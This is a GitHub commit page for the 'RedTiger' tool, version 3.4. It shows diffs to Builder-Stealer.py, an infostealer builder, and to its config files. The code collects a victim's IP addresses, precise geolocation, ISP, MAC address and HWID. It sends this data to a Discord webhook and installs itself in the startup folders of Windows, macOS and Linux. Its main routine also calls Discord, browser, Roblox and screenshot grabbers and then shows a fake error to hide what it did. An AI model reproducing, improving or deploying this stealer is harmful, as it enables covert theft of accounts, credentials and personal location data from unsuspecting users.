Skip to content

Commit

Permalink
discord.gg/XUs2f9jz8j
Browse files Browse the repository at this point in the history
  • Loading branch information
『 Anonyme 』 authored and 『 Anonyme 』 committed Mar 25, 2024
1 parent c8f8736 commit 318ad3a
Show file tree
Hide file tree
Showing 22 changed files with 279 additions and 222 deletions.
Empty file.
Binary file modified Img/Grab_System.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file removed Img/Info_Ip.png
Binary file not shown.
Binary file removed Img/Info_Number.png
Binary file not shown.
Binary file removed Img/Info_Token.png
Binary file not shown.
Binary file removed Img/Info_Webhook.png
Binary file not shown.
Binary file removed Img/Starred.png
Binary file not shown.
167 changes: 87 additions & 80 deletions Settings/Program/Builder-Stealer.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,7 @@
import requests
from Crypto.Cipher import AES
import subprocess
from datetime import datetime
import datetime
import base64
import re
import string
Expand Down Expand Up @@ -53,20 +53,17 @@ def Roblox_Grab():
def Fake_Error():
()
def get_current_datetime():
now = datetime.now()
return now.hour, now.minute, now.second, now.year, now.day, now.month
hour, minute, second, year, day, month = get_current_datetime()
def current_time_day_hour():
return datetime.datetime.now().strftime('%Y/%m/%d - %H:%M:%S')
color_embed = 0xB20000
username_embed = 'Red Tiger'
avatar_embed = 'https://cdn.discordapp.com/attachments/1184160374342299688/1184160439001686056/IMG_1506.png?ex=658af659&is=65788159&hm=9a0297ee590e78acbafc75bc4686ce2b553e40a2f2a850101378a09f23e32d08&'
footer_embed = {
"text": f"Red Tiger | {month}/{day}/{year} - {hour}:{minute}:{second}",
"text": f"Red Tiger | {current_time_day_hour()}",
"icon_url": "https://media.discordapp.net/attachments/944760272265031720/1179429697495498834/IMG_1506.png?ex=6582fb00&is=65708600&hm=cbdc48779b762d4d7c95c34bb68a8aabf8314519d0b50c4d7371bea19eac5db4&=&format=webp&quality=lossless",
}
footer_text = f"Red Tiger | {month}/{day}/{year} - {hour}:{minute}:{second}"
footer_text = f"Red Tiger | {current_time_day_hour()}"
try:
Expand All @@ -86,80 +83,79 @@ def get_current_datetime():
displayname_pc = "None"
try:
response = requests.get('https://httpbin.org/ip')
ip_address_public = response.json()['origin']
except:
ip_address_public = "None"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip_address_local = s.getsockname()[0]
s.close()
response = requests.get('https://httpbin.org/ip')
ip_address_public = response.json()['origin']
except:
ip_address_local = "None"
ip_address_public = "None"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip_address_ipv4 = s.getsockname()[0]
s.close()
ip_address_ipv4 = s.getsockname()[0]
s.close()
except:
ip_address_ipv4 = "None"
ip_address_ipv4 = "None"
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(('2001:4860:4860::8888', 80))
ip_address_ipv6 = s.getsockname()[0]
ip_address_ipv6 = []
all_interfaces = socket.getaddrinfo(socket.gethostname(), None)
for interface in all_interfaces:
if interface[0] == socket.AF_INET6:
ip_address_ipv6.append(interface[4][0])
except:
ip_address_ipv6 = "None"
try:
try:
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip_address_public}")).read().decode().replace('callback(', '').replace('})', '}')
ipdata = loads(ipdatanojson)
except:
except:
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip_address_ipv6}")).read().decode().replace('callback(', '').replace('})', '}')
ipdata = loads(ipdatanojson)
else:
()
try:
country = ipdata["country_name"]
except:
country = "None"
try:
city = ipdata["city"]
except:
city = "None"
try:
try:
country_code = ipdata["country_code"].lower()
except:
except:
country_code = "None"
try:
postal = ipdata["postal"]
except:
postal = "None"
country_code = "None"
try:
state = ipdata["state"]
try:
response = requests.get(f"http://ip-api.com/json/{ip_address_public}")
data = response.json()
status = data["status"]
except:
response = requests.get(f"http://ip-api.com/json/{ip_address_ipv6}")
data = response.json()
status = data["status"]
if status in ["fail"]:
status = "Invalid"
ip_adress, country, country_code, region, region_code, city, zip_postal, latitude, longitude, timezone, isp, org, as_number, url_position = "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None"
else:
status = "Valid"
ip_adress = data["query"]
country = data["country"]
region = data["regionName"]
region_code = data["region"]
city = data["city"]
zip_postal = data["zip"]
latitude = data["lat"]
longitude = data["lon"]
timezone = data["timezone"]
isp = data["isp"]
org = data["org"]
as_number = data["as"]
url_position = f"https://www.google.com/maps/search/?api=1&query={latitude},{longitude}"
except:
state = "None"
ip_adress, country, region, region_code, city, zip_postal, latitude, longitude, timezone, isp, org, as_number, url_position = "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None", "None"
'''

# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Expand All @@ -178,7 +174,10 @@ def System_Grab():
except:
system_version_info = "None"
try:
mac_address = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
except:
mac_address = "None"
try:
hwid = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True,
stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
Expand Down Expand Up @@ -364,14 +363,18 @@ def embed_system(webhook_url, title, fields, color, footer, username, avatar):
Exploitation : "{system_info} {system_version_info}"
HWID : "{hwid}"
MAC : "{mac_address}"
CPU : "{cpu_info}, {cpu_core_info} Core"
GPU : "{gpu_info}"
RAM : "{ram_info}Go"```""", "inline": False},
{"name": f":satellite: | Ip:", "value": f"""```Public : "{ip_address_public}"
Local : "{ip_address_local}"
Ipv4 : "{ip_address_ipv4}"
Ipv6 : "{ip_address_ipv6}"```""", "inline": False},
{"name": f":satellite: | Ip:", "value": f"""```
Public : "{ip_address_public}"
Ipv4 : "{ip_address_ipv4}"
Ipv6 : "{ip_address_ipv6}"
Isp : "{isp}"
Org : "{org}"
As : "{as_number}"```""", "inline": False},
{"name": f":minidisc: | Disk:", "value": f"""```{disk_stats}```""", "inline": False},
Expand All @@ -381,10 +384,14 @@ def embed_system(webhook_url, title, fields, color, footer, username, avatar):
Secondary Screen:
{second_screen}```""", "inline": False},
{"name": f":flag_{country_code}: | Location:", "value": f"""```Country : "{country}"
State : "{state}"
Postal : "{postal}"
City : "{city}"```""", "inline": False},
{"name": f":flag_{country_code}: | Location:", "value": f"""```Country : "{country} ({country_code})"
Region : "{region} ({region_code})"
Zip : "{zip_postal}"
City : "{city}"
Timezone : "{timezone}"
Latitude : "{latitude}"
Longitude : "{longitude}"
```""", "inline": False},
]
embed_system(webhook_url, title, fields, color_embed, footer_embed, username_embed, avatar_embed)
Expand Down Expand Up @@ -1282,7 +1289,7 @@ def Startup():
try:
try:
chemin_script = os.path.abspath(__file__)
nouveau_nom = "Service.py"
nouveau_nom = ".py"
if sys.platform.startswith('win'):
dossier_demarrage = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
Expand All @@ -1291,14 +1298,14 @@ def Startup():
elif sys.platform.startswith('linux'):
dossier_demarrage = os.path.join(os.path.expanduser('~'), '.config', 'autostart')
else:
()
pass
chemin_nouveau_fichier = os.path.join(dossier_demarrage, nouveau_nom)
shutil.copy(chemin_script, chemin_nouveau_fichier)
os.chmod(chemin_nouveau_fichier, 0o777)
except:
chemin_script = sys.executable
nouveau_nom = "Service.exe"
nouveau_nom = ".exe"
if sys.platform.startswith('win'):
dossier_demarrage = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
elif sys.platform.startswith('darwin'):
Expand All @@ -1310,7 +1317,7 @@ def Startup():
shutil.copy(chemin_script, chemin_nouveau_fichier)
os.chmod(chemin_nouveau_fichier, 0o777)
except:
()
pass
'''

# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Expand All @@ -1328,27 +1335,27 @@ def Startup():
try:
Startup()
except:
()
pass
try:
System_Grab()
except:
()
pass
try:
Screenshot_Grab()
except:
()
pass
try:
Discord_Grab()
except:
()
pass
try:
Browser_Grab()
except:
()
pass
try:
Roblox_Grab()
except:
()
pass
payload = {
'content': f'****╚══════════════════{ip_address_public}══════════════════╝****',
Expand All @@ -1360,7 +1367,7 @@ def Startup():
try:
Fake_Error()
except:
()
pass
'''

# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Expand All @@ -1380,23 +1387,23 @@ def Startup():
try:
System_Grab()
except:
()
pass
try:
Roblox_Grab()
except:
()
pass
try:
Screenshot_Grab()
except:
()
pass
try:
Discord_Grab()
except:
()
pass
try:
Browser_Grab()
except:
()
pass
payload = {
'content': f'****╚══════════════════{ip_address_public}══════════════════╝****',
Expand Down
3 changes: 2 additions & 1 deletion Settings/Program/Config/Config.py
Original file line number Diff line number Diff line change
@@ -1,8 +1,9 @@
name_tool = "RedTiger"
version_tool = "3.3"
version_tool = "3.4"
coding_tool = "Python 3"
language_tool = "EN"
creator = "FluzyTeck"
creator_discord = "fluzyteck (1199071876874518609)"
discord_server = "discord.gg/XUs2f9jz8j"
website = "red-tiger.000webhostapp.com"
github_tool = "github.com/fluzyteck/RedTiger-Tools"
Expand Down
7 changes: 6 additions & 1 deletion Settings/Program/Config/Util.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
import os
import time
import sys
from datetime import datetime
import datetime

color_webhook = 0xa80505
username_webhook = name_tool
Expand All @@ -23,6 +23,11 @@
except:
username_pc = "redtiger"

def current_time_day_hour():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def current_time_hour():
return datetime.datetime.now().strftime('%H:%M:%S')

INPUT = f'{red}[{white}>{red}] |'
INFO = f'{red}[{white}!{red}] |'
ERROR = f'{red}[{white}x{red}] |'
Expand Down
Binary file modified Settings/Program/Config/__pycache__/Config.cpython-312.pyc
Binary file not shown.
Binary file modified Settings/Program/Config/__pycache__/Util.cpython-312.pyc
Binary file not shown.
Loading

0 comments on commit 318ad3a

Please sign in to comment.